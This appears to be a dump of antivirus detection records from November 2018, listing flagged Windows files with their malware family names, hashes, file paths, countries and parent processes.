  Row(detection=Row(filename='service.exe', filepath='D:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T14:48:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir001', filepath='\\\\?\\C:\\Applications\\Service.VIR001', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir001', filepath='\\\\?\\C:\\Applications\\Service.VIR001', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir002', filepath='\\\\?\\C:\\Applications\\Service.VIR002', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir002', filepath='\\\\?\\C:\\Applications\\Service.VIR002', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140.exe', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir000', filepath='\\\\?\\C:\\Applications\\Service.VIR000', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir000', filepath='\\\\?\\C:\\Applications\\Service.VIR000', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_19473900.vir', filepath='\\\\?\\C:\\Applications\\Service_19473900.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_19473900.vir', filepath='\\\\?\\C:\\Applications\\Service_19473900.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_18bdd202.vir', filepath='\\\\?\\C:\\Applications\\Service_18bdd202.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_18bdd202.vir', filepath='\\\\?\\C:\\Applications\\Service_18bdd202.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154916-597c7298', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9964d971\\AVSCAN-20181101-154901-5679EAFA\\AVSCAN-20181101-154916-597C7298', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:49:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140_30ab8c89_bd613be2.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140_30ab8c89_bd613be2.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='c:\\applic~1\\service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline='2904', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Applications\\Service.exe', parentsize=14208000, timestamp='2018-11-01T09:17:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:18:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:01:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-135555-5d268c9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41bd894e\\AVSCAN-20181101-135209-42DB619E\\AVSCAN-20181101-135555-5D268C9E', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:56:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T17:19:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T17:19:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234838-af4fe867', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-234838-AF4FE867', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=23040, timestamp='2018-11-01T10:33:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trzc36d.tmp', filepath='\\\\?\\C:\\Applications\\trzC36D.tmp', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:59:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171856-2526ee3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a089a6cb\\AVSCAN-20181101-171840-223B19C1\\AVSCAN-20181101-171856-2526EE3E', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:19:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235708-02408994', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235708-02408994', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:54:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='NG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:29:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:29:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102153-e9067c66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6a58198\\AVSCAN-20181101-102035-DF6644A0\\AVSCAN-20181101-102153-E9067C66', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:22:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234807-aa433497', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-234807-AA433497', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:45:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234845-b086f61b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-234845-B086F61B', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:11:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T13:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T13:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T13:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235653-ffce6b55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235653-FFCE6B55', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:53:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235543-f46b9c7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235543-F46B9C7C', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234737-a58584e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-234737-A58584E6', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:44:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1a70231d-6294-4683-83ea-5763b81b5116.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1A70231D-6294-4683-83EA-5763B81B5116\\1A70231D-6294-4683-83EA-5763B81B5116.exe', filesize=1280000, name='HEUR/AGEN.1031465.#M1.#R1'), hash='cc53c0083b2158bb6abafdab0da31474d97548d4a40f33de09f8bac83f8d98e5', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T19:49:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205723-da51675b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_696068c8\\AVSCAN-20181101-205523-C073CBF2\\AVSCAN-20181101-205723-DA51675B', filesize=1280000, name='TR/Agent.tyhsb.#M1.#R1'), hash='cc53c0083b2158bb6abafdab0da31474d97548d4a40f33de09f8bac83f8d98e5', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:57:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instdemo.exe', filepath='C:\\Program Files\\Lenovo\\OneKey Optimizer\\bin\\InstDemo.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='cc60da7ff095f3c23898529ec2eb4997affe3d8d01d5d7525c204db1697b2f9b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:qUv4jfh3g0m\\\\\\/0sX6.1', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T10:52:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-191126-db2b7500', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16bdc093\\AVSCAN-20181031-190600-B1974AD3\\AVSCAN-20181031-191126-DB2B7500', filesize=64000, name='Worm/Agent.64000.22.#M1.#R1'), hash='cc89a74b08d086e9ad57161bfee1f7f0c56802f3c6646bc3863ad41095fdaecc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='C:\\Program Files (x86)\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='cd4ac8d5b574de69d3fdafa613fc92de2570b91b65537a6ad18518275d24b2e5', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T23:31:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cd4e8fc57282bf8fec5014d2816c12a060e4d6959852d3c0449b84d4be2de9bc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\CD4E8FC57282BF8FEC5014D2816C12A060E4D6959852D3C0449B84D4BE2DE9BC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cd4e8fc57282bf8fec5014d2816c12a060e4d6959852d3c0449b84d4be2de9bc', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='photos.exe', filepath='E:\\school\\Local\\งานนักเรียนภาคเรียนที่ 1 ปี 2553\\ผลงานนักเรียน ภ\\งานม.6.1\\Phatcharawan\\Photos\\Photos.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='cd63caa11f603787fa42fa7b043864a8aeb46b4b300cf4cc7231c5f5f48189b8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='errlook.exe', filepath='H:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\Common7\\Tools\\errlook.exe', filesize=100000, name='W32/Neshta.A.#M1.#R1'), hash='cd72af8b4850a697f60bd5c0c78a15bb638c3adbff0c269d8697d139b2b544cd', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:09:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='udyb.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Axviy\\udyb.exe', filesize=320000, name='HEUR/AGEN.1002500.#M1.#R1'), hash='cd8fd5025afea49431ecd64a461374d6552d796e4fb43b042f484f8e7d426d5e', metadata=Row(cmdline='\\\\\\/scan \\\\\\/cleanclose', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Spybot - Search & Destroy 2\\SDScan.exe', parentsize=7651984, timestamp='2018-11-01T14:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152536-25b5c1a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_782bea3d\\AVSCAN-20181101-152455-2082CB32\\AVSCAN-20181101-152536-25B5C1A6', filesize=320000, name='HEUR/AGEN.1002500.#M1.#R1'), hash='cd8fd5025afea49431ecd64a461374d6552d796e4fb43b042f484f8e7d426d5e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:25:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-062843-8d5e71dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_293ada43\\AVSCAN-20181101-062504-6219FBB3\\AVSCAN-20181101-062843-8D5E71DD', filesize=7232000, name='HEUR/AGEN.1014567.#M1.#R1'), hash='cdd589e4299501dafddd9901450b24b6103ef55cc6496ee13a813585379d5f58', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:29:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install_flash_player_13_plugin.exe', filepath='C:\\Users\\X\\Desktop\\2018nasties\\install_flash_player_13_plugin.exe', filesize=7232000, name='HEUR/AGEN.1014567.#M1.#R1'), hash='cdd589e4299501dafddd9901450b24b6103ef55cc6496ee13a813585379d5f58', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:KH0jjft2e06Zvdij.1', country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T07:47:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ce2d00fc78be085e5c3721af4a2925bc05fceb1ccf90c5c603399e2efc597e5b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T18:36:26Z'), dt=datetime.date(2018, 11, 1)),
